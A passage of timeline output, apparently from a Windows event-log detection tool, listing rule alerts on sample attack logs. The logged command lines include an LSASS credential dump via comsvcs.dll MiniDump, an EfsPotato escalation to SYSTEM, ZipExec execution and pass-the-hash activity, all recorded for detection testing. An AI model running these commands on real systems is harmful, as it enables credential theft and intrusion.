+09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: c:\temp\EfsPotato.exe whoami : Path: C:\temp\EfsPotato.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\temp\EfsPotato.exe whoami,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding : Path: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx +2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx +2021-10-19 23:42:41.218 +09:00,FS03.offsec.lan,4728,medium,User added to global security group,Member added: - : SID: S-1-5-21-3410678313-1251427014-1131291384-1004 : Group: None : Subject user: admmig : Subject domain: OFFSEC,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,medium,Local user account created,User: toto3 : 
SID:S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx +2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx +2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,informational,Logon Type 9 - NewCredentials,User: admmig : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x266e045 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 
0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 
+09:00,FS03.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,PowerShell Get-Process LSASS,,rules/sigma/process_creation/win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.089 
+09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full : Path: C:\Windows\System32\rundll32.exe : User: OFFSEC\admmig : Parent Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : 
IP Address: 10.23.123.11 : Port: 49192 : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 38940 : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump 
with LSASSY (process).evtx +2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,LSASS Access from Non System 
Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 
+2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: cscript.exe //e:jscript testme.js : Path: C:\Windows\System32\cscript.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,WSF/JSE/JS/VBA/VBE File 
Execution,,rules/sigma/process_creation/win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" : Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:14.015 
+09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" : Path: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,informational,Bits Job Creation,Job Title: BITS Transfer : URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx +2021-10-22 05:40:12.867 